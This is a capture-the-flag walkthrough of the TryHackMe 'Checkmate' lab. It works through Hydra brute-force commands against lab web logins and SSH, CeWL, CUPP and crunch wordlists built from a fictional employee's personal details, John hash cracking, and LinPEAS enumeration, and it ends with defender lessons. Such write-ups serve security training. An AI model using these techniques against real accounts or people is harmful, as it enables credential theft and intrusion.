TryHackMe — Checkmate | Full Walkthrough
OverviewCheckmate is a password-focused lab on TryHackMe that simulates a realistic internal network 2026-6-16 06:49:16 Author: infosecwriteups.com(查看原文) 阅读量:6 收藏

Overview

Checkmate is a password-focused lab on TryHackMe that simulates a realistic internal network compromise scenario. The target is Marco Bianchi, an IT Operations employee whose weak password habits are exploited across multiple internal systems — from a firewall panel to SSH access. The lab teaches reconnaissance, credential harvesting, custom wordlist generation, hash cracking, and pattern-based brute forcing.

Attack Surface:

Port Service 5000 Level App (API) 5001 FirewallOS Admin Panel 5002 Engineering Careers / Employee Portal 5003 Social.thm (Social Network) 22 SSH

Phase 1: Reconnaissance

Port Discovery & Directory Enumeration

Starting with service discovery across all four web ports using feroxbuster:

feroxbuster -u 'http://10.48.176.143:5000/' -w /usr/share/wordlists/dirb/common.txt -s 200
feroxbuster -u 'http://10.48.176.143:5001/' -w /usr/share/wordlists/dirb/common.txt -s 200
feroxbuster -u 'http://10.48.176.143:5002/' -w /usr/share/wordlists/dirb/common.txt -s 200

Results:

  • http://10.48.176.143:5000/state — System state endpoint
  • http://10.48.176.143:5001/ — FirewallOS login panel
  • http://10.48.176.143:5002/login — Employee Portal login
  • http://10.48.176.143:5003/login — Social.thm login

OSINT — jobs.thm (Port 5002)

The Engineering Careers portal revealed key intelligence about our target before authentication was even required. The public job listings exposed:

  • Company values: Innovation, Excellence, Integrity
  • Target employee: Marco Bianchi — IT Operations Specialist
  • Locations: London, Berlin (remote/hybrid roles)

This OSINT phase is critical. These keywords will later form the basis of our custom wordlists.

Phase 2: Level 1 — FirewallOS (Port 5001)

Default Credential Attack

The FirewallOS admin panel is the first target. The system message on the panel itself hints: “Initial deployment completed with default admin credentials.”

Building a default credential wordlist:

cat << 'EOF' > default_list.txt
admin
admin123
password
firewall
12345
123456
root
secret
EOF

Launching Hydra:

hydra -l admin -P default_list.txt 10.48.176.143 -s 5001 \
  http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid credentials" -t 4

Result:

[5001][http-post-form] host: 10.48.176.143  login: admin  password: 12345

Level 1 Password: 12345

FirewallOS Intelligence Gathering

Inside the dashboard, two critical pieces of information are visible:

  1. Policy set: Marco_Default — confirms Marco manages this firewall
  2. Allow-SSH rule: AdminNet → Servers (22/tcp) — SSH is restricted but accessible from the right network
  3. System Message: “Secure internal employee portal next.” — confirms our next target

Phase 3: Level 2 — Employee Portal (Port 5002)

CeWL Wordlist Generation

The Engineering Careers portal contains rich content — job descriptions, company values, and keywords that an employee like Marco might use as a password. CeWL scrapes this content into a wordlist:

cewl http://10.48.176.143:5002/ -w jobs_words.txt

This generates over 100 words including: excellence, innovation, security, operations, London, Berlin, integrity, and more.

Expanding the wordlist with year-based mutations:

for word in $(cat jobs_words.txt); do
    echo "$word"
    echo "${word}!"
    echo "${word}2024"
    echo "${word}2025"
    echo "${word}2024!"
    echo "${word}2025!"
done > marco_passwords.txt
sort -u marco_passwords.txt -o marco_passwords.txt

Brute Force Attack

hydra -l marco -P marco_passwords.txt 10.48.176.143 -s 5002 \
  http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid credentials" -t 4

Result:

[5002][http-post-form] host: 10.48.176.143  login: marco  password: excellence

Level 2 Password: excellence

After logging in, Marco’s full employee profile is revealed:

Field Value First Name Marco Surname Bianchi Nickname marky Birthdate (DDMMYYYY) 14021995 Role IT Operations

This personal data becomes the foundation for Level 3.

Phase 4: Level 3 — Social.thm (Port 5003)

Personal Information Wordlist — CUPP

The hint on the social.thm login page reads: “Use the details from jobs.thm to generate Marco’s password.”

With Marco’s personal information now in hand, the correct approach is to use CUPP (Common User Passwords Profiler) — a tool that generates targeted wordlists from personal data:

cupp -i

Entering Marco’s details:

  • Name: Marco
  • Surname: Bianchi
  • Nickname: marky
  • Birthdate: 14021995

CUPP generates combinations like Bianchi2495, marco1995, Marky14021995, etc.

Attack

hydra -l marco -P marco.txt 10.48.176.143 -s 5003 \
  http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid credentials" -t 1 -w 5

Level 3 Password: Bianchi2495

Get Shikhali Jamalzade’s stories in your inbox

Join Medium for free to get updates from this writer.

Remember me for faster sign in

After logging in, Marco’s social feed reveals two key hints for the remaining levels:

Post 1 (Level 5 hint):

“My tip for strong password: I take a company keyword, capitalize it, then append the year like 2024 or any other number and an exclamation mark.”

Tags: security, excellence, innovation, digital, cloud

Post 2 (Level 4 hint):

Check In: Oliver’s Hotel — with a profile picture

Phase 5: Level 4 — Hash Cracking

SHA256 Hash Identification

The profile picture is stored with a hashed filename:

d34a569ab7aaa54dacd715ae64953455d86b768846cd0085ef4e9e7471489b7b.png

This is a SHA256 hash. The challenge: crack it to find the plaintext value — which will be Marco’s password for this level.

echo "d34a569ab7aaa54dacd715ae64953455d86b768846cd0085ef4e9e7471489b7b" > marcopic.txt
john --format=raw-sha256 --wordlist=/usr/share/wordlists/rockyou.txt marcopic.txt

Result:

family           (?)

Level 4 Password: family

Phase 6: Level 5 — SSH Access

Pattern-Based Brute Force with Crunch

Marco’s social post gave away his exact password formula:

[Capitalized company keyword] + [Year] + [!]

From the social post tags, Security is the most likely keyword. The year 2024 fits the pattern. Using crunch to generate all possibilities for Security20XX!:

crunch 13 13 -t Security20%%! -o marco-password.txt

This generates exactly 100 passwords: Security2000! through Security2099!.

Launching Hydra against SSH:

hydra -l marco -P marco-password.txt 10.48.176.143 ssh -t 4

Result:

[22][ssh] host: 10.48.176.143  login: marco  password: Security2024!

Level 5 Password: Security2024!

SSH Access Confirmed

ssh [email protected]
# Password: Security2024!
marco@tryhackme-2404:~$ whoami
marco

Post-Exploitation — System Enumeration

With shell access as Marco, running LinPEAS for privilege escalation opportunities:

# Transfer via SCP (SSH port is allowed)
scp /root/linpeas.sh [email protected]:/tmp/linpeas.sh
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh 2>/dev/null | tee /tmp/out.txt

Key Findings

System: Ubuntu 24.04 LTS (AWS EC2 — t3a.small, ap-south-1)

Users with console access:

marco   uid=1001 — current user
qa      uid=1002 — member of sudo group (!)
ubuntu  uid=1000 — member of sudo group
root    uid=0

Critical finding — qa user has sudo privileges:

uid=1002(qa) gid=1002(qa) groups=1002(qa),27(sudo),100(users)

If qa's credentials can be obtained, full root access is achievable via sudo su.

Running services (ubuntu user):

/usr/bin/python3 social_app.py
/usr/bin/python3 level_app.py
/usr/bin/python3 jobs_app.py
/usr/bin/python3 firewall_app.py

All lab applications run as ubuntu from /home/ubuntu/lab/ — a restricted directory.

IAM Role exposed (AWS metadata): The machine runs with an attached IAM role named vulnerable-machine, and temporary AWS credentials were accessible via the metadata endpoint — a common real-world misconfiguration in cloud environments.

Attack Chain Summary

[Reconnaissance]
  └─ feroxbuster → discovered 4 web services + /state endpoint
  └─ CeWL → scraped jobs.thm for keyword intelligence
  └─ OSINT → Marco's name, nickname, birthdate, role
[Level 1 — FirewallOS]
  └─ Default credentials: admin:12345
  └─ Intel: Marco_Default policy, SSH restricted to AdminNet[Level 2 — Employee Portal]
  └─ CeWL wordlist + Hydra → marco:excellence
  └─ Intel: Full personal profile (name, nickname, birthdate)[Level 3 — Social.thm]
  └─ CUPP personal wordlist → marco:Bianchi2495
  └─ Intel: Password formula hint + profile picture hash[Level 4 — Hash Cracking]
  └─ SHA256 hash from profile picture filename
  └─ John the Ripper + rockyou.txt → family[Level 5 — SSH]
  └─ Crunch pattern (Security20%%!) + Hydra → marco:Security2024!
  └─ Shell access achieved[Post-Exploitation]
  └─ LinPEAS enumeration
  └─ qa user identified as sudo member
  └─ AWS IAM credentials exposed via metadata

Lessons Learned

For defenders:

  1. Never use default credentials. admin:12345 on a production firewall is catastrophic.
  2. Don’t publish personal information in employee portals accessible before authentication.
  3. Password policies must enforce complexityexcellence, family, and formula-based passwords like Security2024! are trivially crackable.
  4. Profile picture filenames should not be reversible hashes of meaningful values.
  5. OSINT is real. Every word on a public-facing web application is a potential password component.
  6. Restrict metadata endpoint access on cloud instances to prevent IAM credential theft.

Tools used:

Tool Purpose feroxbuster Directory enumeration CeWL Website-based wordlist generation CUPP Personal info wordlist generation Hydra HTTP and SSH brute force Crunch Pattern-based wordlist generation John the Ripper SHA256 hash cracking LinPEAS Post-exploitation enumeration SCP File transfer via SSH


文章来源: https://infosecwriteups.com/tryhackme-checkmate-full-walkthrough-49a418a8e956?source=rss----7b722bfd1b8d---4
如有侵权请联系:admin#unsafe.sh